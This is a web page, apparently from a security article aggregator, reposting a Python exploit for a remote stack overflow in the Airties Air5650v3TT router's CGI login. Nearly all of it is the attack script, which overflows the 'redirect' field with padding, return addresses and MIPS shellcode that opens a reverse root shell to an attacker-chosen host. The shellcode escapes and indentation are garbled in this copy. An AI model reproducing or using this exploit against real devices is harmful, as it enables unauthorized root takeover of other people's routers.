HackDig : Dig high-quality web security articles for hackers

Airties Air5650v3TT Remote Stack Overflow

2015-04-04 05:30

#!/usr/bin/env python
#####################################################################################
# Exploit for the AIRTIES Air5650v3TT
# Spawns a reverse root shell
# Author: Batuhan Burakcin
# Contact: [email protected]
# Twitter: @batuhanburakcin
# Web: http://www.bmicrosystems.com
#####################################################################################

import sys
import time
import string
import socket, struct
import urllib, urllib2, httplib





if __name__ == '__main__':




try:
ip = sys.argv[1]
revhost = sys.argv[2]
revport = sys.argv[3]
except:
print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0]

host = struct.unpack('>L',socket.inet_aton(revhost))[0]
port = string.atoi(revport)


shellcode = ""
shellcode += "x24x0fxffxfax01xe0x78x27x21xe4xffxfdx21xe5xffxfd"
shellcode += "x28x06xffxffx24x02x10x57x01x01x01x0cxafxa2xffxff"
shellcode += "x8fxa4xffxffx34x0fxffxfdx01xe0x78x27xafxafxffxe0"
shellcode += "x3cx0e" + struct.unpack('>cc',struct.pack('>H', port))[0] +
struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "x35xce" + struct.unpack('>cc',struct.pack('>H', port))[0] +
struct.unpack('>cc',struct.pack('>H', port))[1]
shellcode += "xafxaexffxe4"
shellcode += "x3cx0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] +
struct.unpack('>cccc',struct.pack('>I', host))[1]
shellcode += "x35xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] +
struct.unpack('>cccc',struct.pack('>I', host))[3]
shellcode += "xafxaexffxe6x27xa5xffxe2x24x0cxffxefx01x80x30x27"
shellcode += "x24x02x10x4ax01x01x01x0cx24x11xffxfdx02x20x88x27"
shellcode += "x8fxa4xffxffx02x20x28x21x24x02x0fxdfx01x01x01x0c"
shellcode += "x24x10xffxffx22x31xffxffx16x30xffxfax28x06xffxff"
shellcode += "x3cx0fx2fx2fx35xefx62x69xafxafxffxecx3cx0ex6ex2f"
shellcode += "x35xcex73x68xafxaexffxf0xafxa0xffxf4x27xa4xffxec"
shellcode += "xafxa4xffxf8xafxa0xffxfcx27xa5xffxf8x24x02x0fxab"
shellcode += "x01x01x01x0c"


data = "x41"*359 + "x2AxB1x19x18" + "x41"*40 + "x2AxB1x44x40"
data += "x41"*12 + "x2AxB0xFCxD4" + "x41"*16 + "x2AxB0x7Ax2C"
data += "x41"*28 + "x2AxB0x30xDC" + "x41"*240 + shellcode +
"x27xE0xFFxFF"*48

pdata = {
'redirect' : data,
'self' : '1',
'user' : 'tanri',
'password' : 'ihtiyacmyok',
'gonder' : 'TAMAM'
}

login_data = urllib.urlencode(pdata)
#print login_data

url = 'http://%s/cgi-bin/login' % ip
header = {}
req = urllib2.Request(url, login_data, header)
rsp = urllib2.urlopen(req)


Source: 6200405102-BLW/eussi/moc.ytirucesxc

Read:5910 | Comments:0 | Tags:No Tag

“Airties Air5650v3TT Remote Stack Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Tools

Tag Cloud